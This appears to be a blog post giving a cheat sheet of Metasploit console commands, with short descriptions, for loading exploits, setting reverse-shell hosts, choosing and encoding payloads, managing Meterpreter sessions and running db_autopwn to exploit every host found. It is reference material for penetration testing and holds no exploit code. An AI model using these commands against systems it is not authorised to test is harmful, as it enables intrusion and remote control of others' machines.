MSF Commands Cheat Sheet


MSFconsole Commands Cheat Sheet

show exploits
Show all exploits within the Framework.

 

show payloads
Show all payloads within the Framework.

 

show auxiliary
Show all auxiliary modules within the Framework.

 

search
name
Search for exploits or modules within the Framework.

 

info
Load information about a specific exploit or module.

 

use
name
Load an exploit or module (example: use windows/smb/psexec).

 

LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

 

RHOST
The remote host or the target.

 

set
function
Set a specific value (for example, LHOST or RHOST).

 

setg
function
Set a specific value globally (for example, LHOST or RHOST).

 

show options
Show the options available for a module or exploit.

 

show targets
Show the platforms supported by the exploit.

 

set target
num
Specify a specific target index if you know the OS and service pack.

 

set payload
payload
Specify the payload to use.

 

show advanced
Show advanced options.

 

set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

 

check
Determine whether a target is vulnerable to an attack.

 

exploit
Execute the module or exploit and attack the target.

 

exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)

 

exploit -z
Do not interact with the session after successful exploitation.

 

exploit -e
encoder
Specify the payload encoder to use (example: exploit -e shikata_ga_nai).

 

exploit -h
Display help for the exploit command.

 

sessions -l
List available sessions (used when handling multiple shells).

 

sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

 

sessions -s
script
Run a specific Meterpreter script on all Meterpreter live sessions.

 

sessions -K
Kill all live sessions.

 

sessions -c
cmd
Execute a command on all live Meterpreter sessions.

 

sessions -u
sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

 

db_create
name
Create a database to use with database-driven attacks (example: db_create autopwn).

 

db_connect
name
Create and connect to a database for driven attacks (example: db_connect autopwn).

 

db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as -sT -v -P0.)

 

db_autopwn -h
Display help for using db_autopwn.

 

db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.

 

db_destroy
Delete the current database.

 

db_destroy
user:password@host:port/database
Delete database using advanced options.

 

2 thoughts on “MSF Commands Cheat Sheet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s